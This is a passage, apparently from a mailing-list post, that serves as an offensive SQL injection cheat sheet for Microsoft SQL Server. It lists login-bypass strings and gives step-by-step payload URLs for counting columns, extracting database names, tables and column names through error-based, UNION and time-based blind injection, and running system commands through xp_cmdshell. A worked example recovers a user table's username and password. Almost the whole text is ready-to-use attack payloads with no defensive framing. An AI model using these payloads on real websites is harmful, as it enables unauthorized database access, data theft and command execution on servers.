- radial buttons
- cookie data
- session data
- referrer
- Use a local proxy to substitute the vars with your injection
* Example variables:
- username/passwords
- check boxes
- radial buttons
- cookie data
- session data
- referrer
Some examples injections you can use are:
'
"
;
#
##
%00
--
admin:' or a=a--
admin:' or 1=1--
admin'--
*'") OR ("'* --
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
##############################
# Determine if it is direct or quoted #
##############################
The first error that you are normally confronted with is the syntax
error. A syntax error
indicates that the query does not conform to the proper structure of
an SQL query. The first
thing that you need to figure out is whether injection is possible
without escaping quotation.
Direct
In a direct injection, whatever argument you submit will be used in
the SQL query
without any modification. Try taking the parameter's legitimate value
and appending a space
and the word "OR" to it. If that generates an error, direct injection
is possible.
Quoted
All other instances are quoted injection vulnerabilities. In a quoted
injection, whatever
argument you submit has a quote prepended and appended to it by the
application.
In order to break out of the quotes and manipulate the query while
maintaining valid
syntax, your injection string must contain a single quote before you
use an SQL keyword, and
end in a WHERE statement that needs a quote appended to it.
##############################
# Number of columns enumeration #
##############################
Using 'Order by' to determine the number of columns in a given query
string for use with blind sql injection:
http://www.example.com/index.php?newsid=394 order by 100/*
When we pass 100, it should say "unknown column in order by clause".
We use the process of elimination to determine the number of columns.
Next we would halve the number.
http://www.example.com/index.php?newsid=394 order by 50/*
Again we would get an error. Lets try something like...10
http://www.example.com/index.php?newsid=394 order by 10/*
When we do the number 10, the query completes just fine. We are close,
but there might be more.
http://www.example.com/index.php?newsid=394 order by 15/*
Another error in the order by clause. We know there is more than 10,
but less than 15.
http://www.example.com/index.php?newsid=394 order by 12/*
This passed just fine. Might be more, lets test.
http://www.example.com/index.php?newsid=394 order by 13/*
Error. This means we have 12 columns. Now we are ready for some blind
SQL injection. The reason for doing this is because the union select
query must have the same number of columns when selecting from a
query. Now we run the following on the site and start testing for some
table names:
http://www.example.com/index.php?newsid=null UNION ALL SELECT
1,2,3,4,5,6,7,8,9,0,1,2,3 FROM tablename/*
##########################################
# MS SQL Table, and column name enumeration #
##########################################
Note: All of the table enumeration injections listed below may or may
not require the ('). Be sure to try both. I seem to have more luck
without the (').
Example:
http://www.site.com/article.asp?id=1' having 1=1--
or
http://www.site.com/article.asp?id=1 having 1=1--
' having 1=1--
This query needs the GROUP BY operator, and should return an error
that includes a column name.
' group by table_name.column_name1 having 1=1--
This should also return an error that includes another column name. So
you just repeat the process.
' group by table_name.column_name1, table_name.column_name2 having
1=1--
This should also return an error that includes another column name. So
you just repeat the process.
' group by table_name.column_name1, table_name.column_name3,
table_name.column_name2 having 1=1--
You just keep doing this until you no longer receive errors that
include the column name.
#########################
# Column Type Enumeration #
#########################
' union select sum(column_name1) from table_name --
Look at error message to determine if data is int, or varchar.
' union select sum(column_name2) from table_name --
Look at error message to determine if data is int, or varchar.
' union select sum(column_name3) from table_name --
Look at error message to determine if data is int, or varchar.
############################
# MS SQL Stored Procedures #
############################
'; exec sp_makewebtask "c:\Inetpub\wwwroot\evil.htm", select * from
table_name";--
This should dump the contents of table_name providing you have write
access in order to create the webpage.
' or 1=1; exec master..xp_cmdshell '"ipconfig" > c:\Inetpub\wwwroot
\ip.txt';--
Then browse to the text file.
#############################
# Inference Based SQL Injection #
#############################
Note: The waitfor+delay operator seems to work best for me when used
like this:
http://www.site.com/article.asp?id=;waitfor+delay+'0:0:5';--
;waitfor+delay+'0:0:5';--
See if it takes 5 seconds to return the page. If it does, then you can
ask it questions.
;if+not(substring((select+@@version),%,1)+<>+5)+waitfor+delay
+'0:0:5';--
Ask it if he is running SQL Server 2000
;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--
Ask it if it's running as 'sa'
;if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--
Ask it if the current user a member of the sysadmin group
===================================================================
Summary of notes from evilsql.com
####################################
# MS-SQL INJECTION Basic DETECTION #
####################################
Integer Injection:
http://[site]/page.asp?id=1 having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
String Injection:
http://[site]/page.asp?id=x' having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
ERROR SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--
Syntax error converting the nvarchar value '[DB USER]' to a column of
data type int.
ERROR SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))--
Syntax error converting the nvarchar value '[DB NAME]' to a column of
data type int.
ERROR SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))--
Syntax error converting the nvarchar value '[DB VERSION]' to a column
of data type int.
ERROR SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))--
Syntax error converting the nvarchar value '[SERVER NAME]' to a column
of data type int.
ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85)))--
Syntax error converting the nvarchar value '[TABLE NAME 1]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85) and ,name>'TABLE-NAME-1'))--
Syntax error converting the nvarchar value '[TABLE NAME 2]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85) and ,name>'TABLE-NAME-2'))--
Syntax error converting the nvarchar value '[TABLE NAME 3]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1'))--
Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--
Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--
Syntax error converting the nvarchar value '[COLUMN NAME 3]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-1 from TABLE-NAME-1))--
Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-2 from TABLE-NAME-1))--
Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-3 from TABLE-NAME-1))--
Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE')
order by COLUMN-NAME-1 desc))--
Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND
ROW]' to a column of data type int.
ERROR SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE')
order by COLUMN-NAME-1 desc))--
Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD
ROW]' to a column of data type int.
##########################
# MS-SQL UNION Injection #
##########################
UNION SQL INJECTION - DETECTION
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
UNION SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--
[DB USER]
UNION SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--
[DB NAME]
UNION SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--
[DB VERSION]
UNION SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--
[SERVER NAME]
UNION SQL INJECTION - EXTRACT DATABASE TABLES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from
sysobjects where xtype=char(85)--
[TABLE NAME 1]
UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from
DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--
[COLUMN NAME 1]
UNION SQL INJECTION - EXTRACT 1st FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from
TABLE-NAME-1--
[FIELD 1 VALUE]
UNION SQL INJECTION - EXTRACT 2nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from
TABLE-NAME-1--
[FIELD 2 VALUE]
UNION SQL INJECTION - EXTRACT 3nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from
TABLE-NAME-1--
[FIELD 3 VALUE]
##########################
# MS-SQL Blind Injection #
##########################
BLIND SQL INJECTION - DETECTION
Integer Injection:
http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)
String Injection:
http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)
BLIND SQL INJECTION - EXTRACT DATABASE USER
3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY
'00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY
'00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
D - 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=98) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=99) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>115) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))=109) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Database User = DBO
BLIND SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Database Name = PRO-DB-1
BLIND SQL INJECTION - EXTRACT 1st DATABASE TABLE
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype='U')=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
Table Name = USERS
BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype=char(85) and name>'USERS')=6) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
1,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
3,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
4,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
5,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
6,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Table Name = ORDERS
BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype=char(85) and name>'ORDERS')=9) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
1,1)))=99) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
2,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
4,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
5,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
6,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
7,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
8,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
9,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Table Name = CUSTOMERS
BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-
DB-1.information_schema.columns where table_name='USERS')=4) WAITFOR
DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10
seconds)
Column Name = USER
BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-
DB-1.information_schema.columns where table_name='USERS' and
column_name>'USER')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
Column Name = PASS
BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-
DB-1.information_schema.columns where table_name='USERS' and
column_name>,'PASS')=2) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
Column Name = ID
BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),1,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),2,1))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),3,1))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),4,1))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),5,1))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = ADMIN
BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),2,1))=50) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),3,1))=51) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = 123
BLIND SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID from USERS)=3)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),2,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),3,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = 100
BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS
where USER NOT in ('ADMIN') order by USERS desc)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
2,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = JOE
BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS
where USER NOT in ('JOE') order by USERS desc)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
2,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
3,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = JIM
Reply all
Reply to author
Forward
0 new messages